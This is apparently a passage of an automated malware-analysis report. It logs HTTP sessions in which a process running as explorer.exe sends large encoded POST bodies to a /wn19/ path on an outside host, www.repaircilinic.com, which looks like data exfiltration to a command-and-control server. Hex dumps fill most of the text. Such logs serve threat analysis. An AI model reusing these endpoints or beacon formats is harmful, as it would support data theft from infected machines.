AnbY3eMAOqmK0i6xcLiT8Ij3FS6cVnvku8ZxJiO(9sEuKvWvipFMQ152b3QyCCKq2Iu7u379oPN7lfGhOnvm0ENNlDKHkHClPXSj-nYoFEjkYWXCnDgwVBVSkoCeS1vRL50eG78ZmS-CVhRYABd9OUeJbskEgIsZ0Wg8Ar1lRnw7FXWfyLdqcjP7HNDRUIW~1YnXlwgOweKOBK0HzH6uXfdpYKnfFSJMzQdHwePsqUTHYPQzng2u7Ais6fgifebcx5hlLKUvO7Xj0aBnp(pSYmoyTW8mc7767bRotxjFZ7Mhw0rV671CFYVCe5bY27yZI9YwTNGe9SqxLAPz9aZnTiJJ-RZ~mpQtDGbrb(XQVnOvRA-0eT7XHVQlDELrueZJRgPV9o2xN5DDJX4WxeY0Q2_IGBoVGswPqgoo0byEoXcQZDC0O(1NEJXIqr5qBtsJmwFGwWtv2GN8vICaewn5AkahsqyFzPJp85kIFW8wPbXxEtovD~UTn~YBVw-WhKde9ZQOS8B28uMU7A_oKY5VhGV1smeBouCuRr4~NFG6nCWaX1NbU2DX3Lm9phF4FiFr1f1unZifj2rZ4Cu~kSd0CAT5LEhg5rMOjrd~3IORS5PbgBN4qZk9Z4HBC3q(RFSo_lGhOcMB9zSEq(IwTSl1Yst87TCC6rb3Y8LFeLPc7soIof_ajZhH9cQxMv29x9Ke7T90K1BrEdTqgK3snM-eobewWeQSIC4gmtzdFquVl8xOtrib5ME6WS5B8pKIag41euEB4pts7wL(KtNGKJfsiJUIM8PCVJ0Jfief1vKv2ucvGoga-PTb9BnFvyC5hDiY3JM5lTuJ4q3qLg4LKGAR0Ude0xuOE9e4IlfRPRvUkBX5FIvIIiPWOi04w4OSaz-O-a-Os5bkv5KT3hYtd~A9gPBDQRfspuB6n(rVzL2BX5nzBrojT4bmgCiqaLdG92MUixbyG0-CCRIqCDOd6UjA5tK6RsXuXv76FpkMJ~L5QTnx_oxNVLl5vEhtF0IWxoKysA5zgZl2dxpm5UL~JVewMM2OM~WrOp-5E8qlftLPa(TatgwtrzK055rJmByPH1dsRdimpgaSYFYp9EP3JiMrzHOppg4qH1N8xsA2jk6nsWpfbjDRRWAAAaHq-z83Wps(6Ki3S5shhMvuAF644M7EpS8XZ~58CnDs9SGLg8dmgvwArK9s3UYzrNkQQkHwtXUqhlK(mnSa0eVa5s5kX3-SYhezFEYylzfsz9eHDozve9dUBJnT1OsZsWzaNVR4ts9~3v3EpCAF5nStEd1Km8gCwrXkx0syioFA6TRZAlzJie6cV7BZUEBFqMZui(Io2hI0_8dCI(j24nepfQYNiVfGYV6KE1UOnarFOS0bUtLrzgS5fkD0gh34SvFKARGhW(EsL7TdGnb9V7xa1X07GcNkLUZ6QGSOX1mGqaKZOGEHBV8jSUt2UcCGbrTO14gGXJnKJDfF_VCI-SXNBoc6Zrw3KP90yY-ooj-WSXGWpR88x15tvB-EprHQHIULBtyN3oySxe4s4MCtiCeoedQUifgZA(yrAzFLFw-A_al2qhwSpQoRLB2pHiKQAfqyCTZvVtGncPeYdLsfvWm9-OdOjhvwxuMVbRJcKExikNzY1h-V45q~lYSDCUbdSeGy_OrBU18T8NqFUiHxPl1o-nQAxqCww(2bZ0rIdlavxacsTpZqVPadUCKV5jdfOh6oTwcUk3XvPqvOEO9g6Kj1To_Dg~Ko5AouvDJE3IKloCB5J2twGMXBp~J1uizQtrOZbUcQErDnD3PsaQ063DYoV9bQHi-FRFb(FTZS0yBPwtXMg0bR_WAeXUaFOCuu1jSCowu6Eqd5F~LXWmwK1OryVnHXbOapN48HelxXMfO2A00(wwFTkxOUQ1GSNjwf0fTWWKOC0U1D_SmS3OOL-4n3bdr6SKjQetVMV674uO0Y89AXDLYx073lIL9qAGpTVrq~zeCMR3DCichNR2lkC5wpBxwBh3-4Cki1pmk~LaikROVXy1-Eknqty~XQrYaUa7-fkUEuxNhFv3UiJjCQWUgfJ4v8RP8iUpoGJZAr_Z924onX5DJYgzq5MILSKYFssvfjlpVXJHwyRmiGiF6iguGG_mO5HZ9Urc-WDmG8IVG5hidSMqC1F4wV06QMyCaJyNeKKn2sOLoE_UwhdJAlI8TbVZl7q90ObGW7uDk8Edxi0sRveXZ7f9LHaOsWU9s(5kT21GrjLhRtVjD4cpZqR4YuIt432GmsKt2dKEDeB0ZBKttT7kqiUnYT80yX8qbeOLlJW07lFPVFmEHPZPMyZ6sH_TzPkk-S40gBrv4cZnxvVzCyweKAvYvIcMCrtOSJCKF9fCYyGCdlDUznZ1XHriCs_YiHAmxFbcWbq4tXvNx5Azah5rxSYCmd8Uy9x0AazHw4k9TmMs-ySB1BHjGPmiA(y8JfF8ixTNhp5RNYMJ3qYzFIrOlUHFMmv4u~0kAhPZiwP3dyoM0od6-Aarzj53wHf2vz_Oxo8dtQ086ZjArluXio_rypW3jhlR6vrF9~jQdEpmP4c0Ct47vcqJJAJlD1wUteYchBr8xfOHUOBn4Gvbr6G8QpkD8Atf9wjPblHSvASE3SQYiy7tydKOvWradVNYHEP3y2vylTDkOZcP8ZyK8sl(MGR38lnIOdV(tT0E3rOpYtvAojBwXqwhbPjYraBK77jXJKMeG2_xxx9jVejF6~O~Np4rW~SH8JLLYimiRcVci8vuy8vvnkmCINcG2mSzTOlMCTUGoed6YXs5Yy6fhLpM8mCkqSK1qEVPmajHVqUibbdlP1uQxe7UzpQwoKRuRmM2Rq0QeC99C3BhZ6Vrez4aSHE~tpROhsJmBKNgG~fjN6DRTKwUh2
May 10, 2022 14:27:08.635790110 CEST	10092	OUT	Data Raw: 4d 54 55 31 63 6c 71 67 75 76 4f 69 49 61 54 65 4a 62 59 68 77 45 42 65 4c 36 64 7a 75 75 46 48 49 48 63 56 42 4c 33 39 59 4d 44 61 64 46 56 73 28 30 6b 57 69 64 33 36 34 4c 36 6b 6b 6e 4f 44 51 45 44 30 48 4d 30 64 57 65 32 41 53 44 39 56 4f 4f Data Ascii: MTU1clqguvOiIaTeJbYhwEBeL6dzuuFHIHcVBL39YMDadFVs(0kWid364L6kknODQED0HM0dWe2ASD9VOOJefc7ZmtsSm2igopU3W9qQ4Lu1KZHKqNdXrahGkHXC075wz6IJlOepRisrxewWTPlibIzKkQrt5NXIp2bd2ADJ9Lqahu5MvRO9w1xhlk1fZyIQL_K_mh0Lm5xoXYm3VcnT0DpCF5TP2UFPxpG-j2k8uoj2T9GBfs1
May 10, 2022 14:27:08.801256895 CEST	10108	OUT	Data Raw: 53 47 64 35 70 41 4d 37 6e 76 71 73 72 58 75 43 64 4b 4b 35 33 49 44 55 43 6f 58 50 66 61 64 56 74 77 76 66 43 67 64 63 38 51 59 42 4e 76 4d 45 6a 33 4a 6c 58 56 41 57 28 74 68 41 4e 6f 41 52 78 6d 73 7a 4c 66 63 56 6c 79 4e 58 4b 49 37 77 6b 4c Data Ascii: SGd5pAM7nvqsrXuCdKK53IDUCoXPfadVtwvfCgdc8QYBNvMEj3JlXVAW(thANoARxmszLfcVlyNXKI7wkL7CTuKyOBEpkzZDOS53yZTXeGGl6GEZc-TPRdOx05Us5gY0MhiCBe(OmkUTyxyIGw(6oUvMsTbQjX7dPTXml_IqYk51B_H4R5u5gX3tNwA0WZuo0N54G9UhhE4Nh8W6uaGUt19SEK~whTboIhjnsgYjILUrpsF6RjO
May 10, 2022 14:27:08.801398993 CEST	10114	OUT	Data Raw: 61 34 39 73 32 6a 38 58 77 65 62 52 67 2d 35 77 75 5a 57 42 67 74 76 5a 61 56 35 41 59 67 46 47 4d 35 4e 4c 66 53 43 4b 64 54 58 67 4a 79 64 4c 58 4a 67 47 51 55 62 49 74 6b 50 79 62 30 56 70 41 6c 41 6d 67 36 4b 53 4d 7a 55 4d 72 70 6e 72 6b 61 Data Ascii: a49s2j8XwebRg-5wuZWBgtvZaV5AYgFGM5NLfSCKdTXgJydLXJgGQUbItkPyb0VpAlAmg6KSMzUMrpnrkaO7ylL7eEAszGLaDalwzmzWabjXNy0Q(dvQ1M7UHwLd8htArYLwHF7IWU4j8l9CwqEXmWQYl1Xva8fGwwOKJX7HSiEuo-RcOYYj9siayMEzWhLg7EA5htapKri96JtZdyqbXaWOLnq_ZIf4ZZAc64ruukaHdSfMO8q
May 10, 2022 14:27:08.966358900 CEST	10117	OUT	Data Raw: 4e 63 76 5a 47 33 37 39 39 77 6f 53 36 6c 45 5a 32 44 79 35 33 6b 38 73 70 43 6c 69 61 2d 34 6c 66 37 37 79 58 32 6e 34 41 68 45 4e 50 79 38 4b 57 75 68 72 64 69 53 39 6e 77 51 4b 38 79 6f 77 38 30 75 5a 46 39 7a 71 47 35 44 50 32 75 54 46 79 7a Data Ascii: NcvZG3799woS6lEZ2Dy53k8spClia-4lf77yX2n4AhENPy8KWuhrdiS9nwQK8yow80uZF9zqG5DP2uTFyzahwlccKY8ErtZCXak_L-Jx6hFVf_48JXqTMK(rx7wapFwXDCEgp51UmLCSJXdVvW31w_g0CQMXuYqzCloYdm7ltpES~5XhyusOFyIQ6ht4qaR3lAch6DG2FaD0NI(sAK(IC0EkXqVi2TKu2KB-gKJX2m~E5iJycuK
May 10, 2022 14:27:08.966543913 CEST	10129	OUT	Data Raw: 65 42 73 79 4f 6b 6e 44 44 48 4f 2d 37 76 4c 58 4c 44 6c 4a 69 43 66 33 65 4c 68 47 61 4f 73 59 49 6e 67 32 6f 50 68 36 47 55 54 49 77 38 65 45 44 42 28 5f 5a 75 6e 50 6f 43 35 52 30 74 71 75 67 37 49 5f 5a 59 63 43 50 4a 78 47 77 47 55 4f 7e 4b Data Ascii: eBsyOknDDHO-7vLXLDlJiCf3eLhGaOsYIng2oPh6GUTIw8eEDB(_ZunPoC5R0tqug7I_ZYcCPJxGwGUO~Kc6jBN7sRxEGqdGJc5lt-W1k_YSugV9NlZEIvCEcktuivCtgf7oQFHR~G6V2cTGN7rXj2zVh9cvQdi9NVN8gEEOPly-khTSXnFc8RZaexLqLoeaX1Xlk3uMt3korrecNmZAZ-GBUyks8TIyB834IvI0(ulPPQkNNsi
May 10, 2022 14:27:08.966723919 CEST	10132	OUT	Data Raw: 48 5a 52 39 46 78 76 33 36 2d 68 30 30 30 78 61 48 41 55 46 5a 52 38 61 6e 71 4d 4a 63 6a 7a 37 77 79 77 77 4d 63 31 4d 4c 6e 33 41 72 50 6f 5f 4c 44 4f 73 34 32 49 59 6d 55 4f 64 67 50 49 43 5a 38 39 36 47 4d 6d 73 43 48 57 5a 39 74 70 4e 69 44 Data Ascii: HZR9Fxv36-h000xaHAUFZR8anqMJcjz7wywwMc1MLn3ArPo_LDOs42IYmUOdgPICZ896GMmsCHWZ9tpNiDcoP0ednHpdLIj4UJhlCBuR7p697RWJk4Ci6fnSwGWZ4FovzMkbECuL7zWORA6QLk4buSjj(gZpAB6TjKWBSVrkxv4MkHBjtqnUjytk2dkKfE53ugjWwE9kjaG5lSU0BJPWJl(kYwewCOe2fifrpeWXWRIKwy~B6dN
May 10, 2022 14:27:08.966903925 CEST	10138	OUT	Data Raw: 70 4f 77 4a 59 75 53 49 35 72 4e 73 39 78 69 53 6c 78 4e 54 70 65 67 46 52 5f 61 6a 59 65 63 62 4a 64 39 62 4d 44 43 41 6a 62 69 68 6d 2d 38 53 28 64 59 66 30 4b 65 45 30 76 58 38 28 67 4d 4a 6f 33 45 62 76 67 56 2d 5a 4f 66 5f 48 2d 4e 6b 4d 64 Data Ascii: pOwJYuSI5rNs9xiSlxNTpegFR_ajYecbJd9bMDCAjbihm-8S(dYf0KeE0vX8(gMJo3EbvgV-ZOf_H-NkMdzqjNRWoMAQ1Vk0vysHeDbE4KB-(b6zcnACaVvFplLpZsbCrdSH9sZyKX8iImFjUna4jv54Gi4ONiyEOfeuoaRfjFfNaj4sOzq3Lpmgi01Ob7Qo3bj4IO5109nhOI5hei4bLxelTxfC9NMRMtGnROSAyCXW2PQoABZ
May 10, 2022 14:27:08.967084885 CEST	10149	OUT	Data Raw: 48 6c 58 48 4f 2d 65 78 42 5a 44 30 59 71 56 56 34 54 49 47 78 33 6c 67 31 48 30 6c 6a 6b 4d 46 69 56 42 4b 4b 6e 68 64 56 33 55 51 50 6f 39 66 6e 49 53 57 4b 44 37 33 65 65 69 44 78 50 55 2d 31 54 57 74 32 61 69 57 54 38 5a 37 28 51 28 32 37 41 Data Ascii: HlXHO-exBZD0YqVV4TIGx3lg1H0ljkMFiVBKKnhdV3UQPo9fnISWKD73eeiDxPU-1TWt2aiWT8Z7(Q(27AROzWs8TivLbGARGQjXdvEcGOnMtPSkgc2yRX8gt7B2igYv5kjqhERzIN~rNkVuwQCixdwKeBqetzbMNBnSc7O9oD64sCY-UsgCDQ26A1moVbEUUKrIL5B59li7IZSeYX8Z68l-eVFPIdjQchAv4hFzqVzxgsGV~x3
May 10, 2022 14:27:09.132085085 CEST	10156	OUT	Data Raw: 47 79 71 30 39 32 51 71 42 77 35 68 72 6a 69 56 63 71 69 57 58 44 4b 43 73 5a 70 6a 28 49 67 79 6a 38 69 52 51 4a 50 67 6e 73 5a 51 42 51 79 79 68 77 37 70 39 61 4d 33 78 4a 30 46 42 39 4d 57 36 48 59 6b 52 4d 32 48 67 53 4f 6e 5a 38 58 78 37 6f Data Ascii: Gyq092QqBw5hrjiVcqiWXDKCsZpj(Igyj8iRQJPgnsZQBQyyhw7p9aM3xJ0FB9MW6HYkRM2HgSOnZ8Xx7oHSRWiMcTHJkD6K3xf-(4aynxwCRts0n8PsIlmNCkqizvI5zFRti3tfCn(y5PWGkYho~PSCfhtEPoL7W5nWpC9jnhKsabVMDi58wTDuOUk9ooniPWoQyYvJuE0_jTEqHF4ByLmwbI0DARm6MLUpkG8HIW3jRcL76qD
May 10, 2022 14:27:09.132198095 CEST	10162	OUT	Data Raw: 6d 55 65 66 76 62 35 30 36 35 4f 42 77 31 36 67 63 70 6d 69 28 48 6b 56 4e 79 50 61 4c 78 46 30 59 6c 4a 6a 4f 5f 37 72 70 61 6b 69 4f 63 49 77 75 48 70 73 74 75 65 79 33 75 53 76 49 61 33 30 47 74 39 63 68 75 64 43 66 54 47 63 69 49 47 4d 54 6e Data Ascii: mUefvb5065OBw16gcpmi(HkVNyPaLxF0YlJjO_7rpakiOcIwuHpstuey3uSvIa30Gt9chudCfTGciIGMTna3DyH74KXsykX-waeNb81KeeToBU1vdgMyons744Evi16CXye-6bfmxMb3Dwvvo54K5logCH0Bf-(51QFvYdJXzVcy0aGg~_BmROeIS7e2zEc2qO4MMiSxYXlhUjtKio5qxz(BXHnAiuO1sw9Pjs2rKECUcn7cWDA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49781	185.53.179.171	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:27:25.137101889 CEST	10252	OUT	GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1 Host: www.repaircilinic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 10, 2022 14:27:25.144925117 CEST	10253	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 10 May 2022 12:27:25 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49782	185.53.179.171	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:27:27.170840979 CEST	10256	OUT	POST /wn19/ HTTP/1.1 Host: www.repaircilinic.com Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.repaircilinic.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.repaircilinic.com/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 6a 6a 69 64 4a 34 4a 39 4b 5a 58 54 31 73 57 75 79 35 54 77 79 53 61 57 75 31 4c 39 71 4c 44 6a 48 62 77 6b 62 59 4b 36 52 61 4f 76 64 50 6e 6d 55 45 63 72 30 5f 79 42 7e 4e 7e 5a 4d 70 51 70 32 42 78 4c 45 66 55 32 4c 54 4d 53 54 31 51 74 30 51 57 42 46 42 37 67 7e 4b 38 31 46 5a 6c 56 68 2d 6b 74 70 73 54 6d 49 54 4b 38 62 48 6a 54 5a 52 43 74 47 77 69 7a 35 46 7a 6b 35 72 42 65 46 2d 66 55 62 66 69 37 4e 69 5a 45 41 66 6c 56 49 65 32 39 77 72 4b 77 49 4b 39 49 57 6d 51 6b 7e 51 74 6d 66 65 38 41 67 70 65 76 33 49 48 62 41 41 63 46 45 70 75 71 35 5a 7e 4c 56 4e 68 54 32 61 6b 74 68 4e 5a 63 66 52 38 77 7e 48 45 44 62 4b 53 53 55 34 78 6e 4c 52 7e 44 32 55 6c 38 71 63 59 64 39 65 65 66 69 31 50 65 53 71 56 2d 49 32 67 30 4d 55 41 66 30 76 6b 64 48 62 50 62 62 64 39 45 67 4a 44 76 59 54 48 34 67 4d 71 52 4a 33 30 50 4c 4c 4d 61 31 31 71 76 4b 78 46 37 74 30 76 73 47 33 37 30 70 61 4f 48 57 71 49 71 32 53 53 79 69 72 55 38 73 38 6c 2d 4d 63 78 4c 41 79 78 75 7a 39 6e 54 41 79 48 72 30 54 68 6d 4c 76 35 44 4f 4d 54 56 61 39 37 5f 64 6f 5a 71 7a 4f 48 7a 53 32 56 36 62 53 28 48 69 46 31 6b 44 62 65 6c 43 5a 45 6d 72 6b 76 31 71 77 38 6f 78 68 75 38 54 4f 4d 42 73 49 38 66 68 35 39 47 4f 78 6a 56 72 45 4e 4f 38 57 56 56 7e 71 68 2d 54 66 38 39 69 32 76 5f 4c 79 62 36 41 76 45 75 4a 46 69 7a 56 67 32 33 67 76 34 30 33 34 59 34 6d 67 65 59 73 6c 62 45 6e 75 73 61 39 36 52 45 64 56 44 48 50 7a 76 4e 50 4d 52 79 74 68 76 48 36 4e 32 51 54 79 46 58 7a 65 48 52 6d 6f 33 34 33 31 39 2d 35 37 61 71 51 54 62 4d 50 7a 31 2d 6a 36 7e 68 55 41 4e 6d 6a 6a 78 33 77 4d 4f 32 58 4e 28 63 79 38 65 37 4d 36 4b 76 28 52 77 63 4b 66 56 68 47 67 48 41 71 77 6a 35 45 7a 4b 41 6f 65 38 54 74 71 7e 69 68 52 59 76 71 64 68 32 37 78 75 62 79 30 33 36 41 48 5a 7a 78 68 59 4c 6f 47 39 34 49 71 68 36 77 53 6e 51 41 31 49 62 44 69 78 31 63 31 44 59 48 65 33 35 5a 41 33 51 64 75 65 37 45 72 6a 62 74 31 52 78 75 34 4d 64 6b 76 65 4e 7e 50 66 64 79 47 44 53 69 49 71 36 6a 56 7e 56 58 47 43 74 57 55 28 31 64 4e 66 76 35 4a 6b 33 44 76 66 30 4e 61 5a 4a 39 49 57 71 4f 31 78 65 71 5a 33 69 6e 42 6e 72 50 42 57 66 50 64 64 75 32 35 4e 50 4e 70 48 4a 77 42 63 2d 56 47 49 6f 36 30 6b 66 35 44 68 58 6c 37 30 48 4b 75 46 6e 77 6c 5a 75 32 42 79 65 66 4a 67 47 7a 5f 65 79 79 58 4a 79 56 54 71 6f 73 37 4b 37 66 74 4f 6b 34 7a 66 4b 41 6e 57 6c 55 79 36 5a 62 47 79 64 6f 49 39 63 6d 51 50 44 63 37 35 64 4e 57 6d 4d 4c 36 56 39 31 74 6b 73 6f 55 5a 30 76 6f 66 4e 77 68 7e 69 46 44 36 6c 4f 39 55 37 73 7a 6b 59 41 33 6a 4d 54 69 4a 61 75 71 59 31 49 2d 74 37 33 76 72 36 68 6d 36 57 70 64 30 51 74 6e 43 61 64 64 65 50 55 79 4d 52 56 52 6f 41 58 36 6b 51 45 64 44 31 64 70 67 5f 4a 4d 6a 4c 34 36 33 62 6e 54 38 70 74 6b 72 53 36 5f 59 50 59 47 57 59 4e 5f 32 64 69 55 33 46 28 50 78 46 61 30 47 75 43 74 61 6c 43 4f 45 66 53 6f 6c 76 51 62 72 54 4e 57 77 56 5a 57 71 2d 48 4c 47 65 6a 53 4e 4e 74 52 7a 67 30 4a 4a 4e 77 6a 43 6c 62 61 79 79 6c 49 73 74 48 2d 36 56 4d 6d 6a 5f 71 38 63 72 6e 58 36 69 6a 75 4a 50 55 34 72 6c 4d 6c 58 67 39 7a 74 35 68 52 54 6f 41 32 64 62 4f 4b 33 7a 53 63 6c 4c 6a 6f 48 30 4f 67 78 74 48 42 6f 46 72 69 38 4c 6f 5a 56 63 55 66 39 4e 34 2d 74 55 28 77 39 56 4b 63 67 7a 6d 53 6e 62 6d 6d 4f 32 42 39 42 68 74 4c 49 58 68 6b 68 62 70 37 73 77 74 6c 4e 4d 6d 33 6a 55 35 57 37 46 42 59 61 4a 65 62 30 37 78 68 59 58 68 35 65 71 75 36 41 7a 70 42 51 78 47 30 57 79 71 51 6b 38 55 4c 6a 6e 4c 32 33 54 71 6b 56 36 44 71 78 70 45 61 69 57 58 6a 66 76 52 38 41 6d 7a 6a 67 37 55 30 6d 31 68 48 6f 63 39 59 6d 5f 34 5a 4f 66 67 61 69 6d 30 68 41 67 69 7a 6f 53 7e 74 59 45 72 51 7e 57 7e 2d 49 38 51 62 65 61 36 63 50 53 4a 75 69 77 72 43 78 32 44 6c 79 4c 32 75 51 69 61 62 54 35 37 59 5a 41 58 55 53 71 57 32 43 4c 30 6e 45 68 46 75 68 5f 37 51 61 43 7e 6d 68 56 74 45 59 6f 74 58 31 56 34 31 48 4d 61 49 46 48 73 4e 54 6a 33 34 4d 70 43 4d 44 71 75 69 74 62 79 4e 51 55 4e 33 5a 69 4b 62 71 44 58 4e 28 73 64 75 65 46 35 4b 48 57 6b 55 49 67 53 42 54 4f 55 4b 4d 61 30 47 66 78 38 75 4b 57 57 79 6f 72 47 4e 72 57 4a 44 34 76 38 70 76 71 Data Ascii: AVnXAh=jjidJ4J9KZXT1sWuy5TwySaWu1L9qLDjHbwkbYK6RaOvdPnmUEcr0_yB~N~ZMpQp2BxLEfU2LTMST1Qt0QWBFB7g~K81FZlVh-ktpsTmITK8bHjTZRCtGwiz5Fzk5rBeF-fUbfi7NiZEAflVIe29wrKwIK9IWmQk~Qtmfe8Agpev3IHbAAcFEpuq5Z~LVNhT2akthNZcfR8w~HEDbKSSU4xnLR~D2Ul8qcYd9eefi1PeSqV-I2g0MUAf0vkdHbPbbd9EgJDvYTH4gMqRJ30PLLMa11qvKxF7t0vsG370paOHWqIq2SSyirU8s8l-McxLAyxuz9nTAyHr0ThmLv5DOMTVa97_doZqzOHzS2V6bS(HiF1kDbelCZEmrkv1qw8oxhu8TOMBsI8fh59GOxjVrENO8WVV~qh-Tf89i2v_Lyb6AvEuJFizVg23gv4034Y4mgeYslbEnusa96REdVDHPzvNPMRythvH6N2QTyFXzeHRmo34319-57aqQTbMPz1-j6~hUANmjjx3wMO2XN(cy8e7M6Kv(RwcKfVhGgHAqwj5EzKAoe8Ttq~ihRYvqdh27xuby036AHZzxhYLoG94Iqh6wSnQA1IbDix1c1DYHe35ZA3Qdue7Erjbt1Rxu4MdkveN~PfdyGDSiIq6jV~VXGCtWU(1dNfv5Jk3Dvf0NaZJ9IWqO1xeqZ3inBnrPBWfPddu25NPNpHJwBc-VGIo60kf5DhXl70HKuFnwlZu2ByefJgGz_eyyXJyVTqos7K7ftOk4zfKAnWlUy6ZbGydoI9cmQPDc75dNWmML6V91tksoUZ0vofNwh~iFD6lO9U7szkYA3jMTiJauqY1I-t73vr6hm6Wpd0QtnCaddePUyMRVRoAX6kQEdD1dpg_JMjL463bnT8ptkrS6_YPYGWYN_2diU3F(PxFa0GuCtalCOEfSolvQbrTNWwVZWq-HLGejSNNtRzg0JJNwjClbayylIstH-6VMmj_q8crnX6ijuJPU4rlMlXg9zt5hRToA2dbOK3zSclLjoH0OgxtHBoFri8LoZVcUf9N4-tU(w9VKcgzmSnbmmO2B9BhtLIXhkhbp7swtlNMm3jU5W7FBYaJeb07xhYXh5equ6AzpBQxG0WyqQk8ULjnL23TqkV6DqxpEaiWXjfvR8Amzjg7U0m1hHoc9Ym_4ZOfgaim0hAgizoS~tYErQ~W~-I8Qbea6cPSJuiwrCx2DlyL2uQiabT57YZAXUSqW2CL0nEhFuh_7QaC~mhVtEYotX1V41HMaIFHsNTj34MpCMDquitbyNQUN3ZiKbqDXN(sdueF5KHWkUIgSBTOUKMa0Gfx8uKWWyorGNrWJD4v8pvqA0IzvEo9CdDR30GeyT~2qK3OLu4V4jxTZ8jm9yCMhFR8ZqZE9Wk-spmVgVeVt-q5~0ICipCvZ948yu4BT330mjbNyjfIuzTfVHFymwK5uRQS4xSs8J1m4hxltfkPOm2ghGBaPzhfi95MkQBeLstpi3ahXUw-ZDaEDMhfzOBjzGr7eOJuYMpLOiYMZqrT9zN-6hlOkBWDCYUlKuoex9VMJ1HvfmBZDIVY1G9YpcAJNX73MibE1TDtWh~FmEpLuWivFthHDDfTHIynMnDX7Y(eHPcArYIH4iM0b3nRcSanieX1~uVhTgRnA_MSnhmfPeX9Z-H9~hp-jwBlwd4hN3Q3ZhPlWrnRWNrMacw5WVRjhtfV0vs9jVA2JE9NcBX-H-Hnd1CCzdfTJZDUn2hlt7VJ~0kKE-inEsLLUA53w1qCRoy_OpJawLmoNQash3K2~tvsYu0yPuyfORJqlqCIRYXKHTiCh_1NskHbm6Q_5XKfKbwcxkUvkCQr7H2Joh5xJWR5V-5foJyxZfr2kNi7(d4nv2LJv8(NxRYehosn8SsShg(Ly1dgJ2eovyE5H_VQ079nuiQnplFEhVnSWFzrofNN4s5c6N6_P5oUqgIDu40_~l8R(FtrBVJn2eiBjqSeOoqFCoe9DDP817MzkMcdmkPZOS8mWC2LVoxTkKXVHZpZPCFeJrnDoMDHxENPu-gzmDtOZ10qdZo_pjKuZjWAzbOWH85HEb2rtLJiVbkMQ9GNQGmP27Hnzn(tvYvVe5Erxu3n4qZ-fAAyLL06d9CJrXkO3dyY8NVFQG~d8i613Fz3gZZLfJzehjixW3CKYrQX(Z8HxoMfpYcQuEhjHQB8iL9qxVi0ohXYSe7F9GbrDBrtb2qbkbGyw32HHfQp0J0icPVeuut2jet
May 10, 2022 14:27:27.170872927 CEST	10263	OUT	Data Raw: 50 70 55 79 70 72 44 74 55 6c 56 4d 75 4e 75 61 4b 41 44 72 69 4e 34 66 43 53 33 58 4f 4e 39 37 7a 44 6e 57 64 6c 78 33 34 50 5f 34 51 7a 52 34 6c 63 2d 31 5a 35 76 61 5a 56 69 38 32 78 61 55 79 76 70 34 52 77 66 70 39 69 53 50 37 70 71 44 68 58 Data Ascii: PpUyprDtUlVMuNuaKADriN4fCS3XON97zDnWdlx34P_4QzR4lc-1Z5vaZVi82xaUyvp4Rwfp9iSP7pqDhXvNbJ8DFsVbl4Mvbq8aMDy3-1hC9yqoU0v7kyysTqHngHG3IluSHtAHnpcUUjPzFUhi8CPuVsSmgpnIpawzJ4KeEfFdpYJOyIygzzSL-KINmPoFmUr(q9MCYVvfyVLQLMmCm(0HA79(0i5j93OEvCU13KQCWrZEAAM
May 10, 2022 14:27:27.170919895 CEST	10265	OUT	Data Raw: 67 33 69 75 63 76 35 57 6a 5a 32 6b 41 59 63 73 68 63 5a 45 65 7a 4c 34 43 38 72 30 30 78 7a 61 65 65 64 6a 38 42 71 6e 54 45 47 66 30 45 73 63 51 4f 44 4d 71 61 35 6c 57 65 48 72 6d 61 68 68 31 64 73 37 31 63 6f 57 72 56 44 7a 73 52 42 43 32 31 Data Ascii: g3iucv5WjZ2kAYcshcZEezL4C8r00xzaeedj8BqnTEGf0EscQODMqa5lWeHrmahh1ds71coWrVDzsRBC21JZauMJPMU3f2AnwlqmbTH0hvXQPrip4LYTAUpGeyEsqusQflPhqfIyTfpFUFsngybfrjeDiyC(gvhfLwTfe2U6rVFlvZZEX(qpowXmqLW5_hbhDDK(aYnHPSOCGnVRIQ7xJc5R0buuXxGZ23VIYh_TcHa4p~njQUc
